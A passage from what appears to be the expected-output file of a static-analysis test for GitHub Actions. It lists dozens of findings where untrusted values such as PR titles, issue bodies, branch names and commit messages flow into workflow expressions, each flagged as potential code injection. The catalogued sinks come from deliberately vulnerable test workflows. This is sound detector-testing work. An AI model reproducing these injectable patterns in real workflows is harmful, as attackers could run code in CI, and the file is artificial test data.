.github/workflows/test9.yml:4:3:4:15 | issue_comment | .github/workflows/test9.yml | +| .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | ${{ fromJson(needs.parse-issue.outputs.payload) }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | .github/workflows/test9.yml | +| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | .github/workflows/test9.yml | +| .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | .github/workflows/test9.yml | +| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | .github/workflows/test9.yml | +| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | ${{ needs.get-artifacts.outputs.pr_num }} | .github/workflows/test11.yml:4:3:4:14 | workflow_run | .github/workflows/test11.yml | +| .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | ${{ github.event.pull_request.title \|\| "foo" }} | .github/workflows/test12.yml:4:3:4:21 | pull_request_target | .github/workflows/test12.yml | +| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | ${{ github.event.changes.body.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | .github/workflows/test13.yml | +| .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | ${{ github.event.changes.title.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | .github/workflows/test13.yml | +| .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | ${{ github.event.changes.head.ref.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | .github/workflows/test13.yml | +| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | ${{ toJson(github.event.changes) }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | .github/workflows/test13.yml | +| .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:14:14:15:117 | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | .github/workflows/test14.yml | +| .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | .github/workflows/test14.yml | +| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | .github/workflows/test14.yml | +| .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | .github/workflows/test14.yml | +| .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | .github/workflows/test15.yml | +| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | .github/workflows/test15.yml | +| .github/workflows/test15.yml:28:21:28:36 | env.TITLE | .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | ${{ env.TITLE }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | .github/workflows/test15.yml | +| .github/workflows/test15.yml:36:21:36:36 | env.TITLE | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | ${{ env.TITLE }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | .github/workflows/test15.yml | +| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | .github/workflows/test16.yml | +| .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | ${{ needs.build-demo.outputs.commit-message }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | .github/workflows/test16.yml | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:26:15:33:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | .github/workflows/test16.yml | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:38:15:45:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | .github/workflows/test16.yml | +| .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | ${{ steps.get-pr.outputs.data }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | .github/workflows/test17.yml | +| .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | ${{ fromJson(steps.get-pr-details.outputs.data).head.ref }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | .github/workflows/test17.yml | +| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | .github/workflows/test17.yml | +| .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | ${{ fromJson(steps.get-pull-request.outputs.data).title }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | .github/workflows/test17.yml | +| .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | .github/workflows/test18.yml:2:3:2:19 | workflow_dispatch | .github/workflows/test18.yml | +| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | .github/workflows/test.yml:2:3:2:21 | pull_request_target | .github/workflows/test.yml | +| .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/untrusted_checkout1.yml:2:3:2:21 | pull_request_target | .github/workflows/untrusted_checkout1.yml | +| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | +| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | +| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | +| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | +| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | +| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | +| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | +| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | +| .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches3.yml:4:3:4:14 | 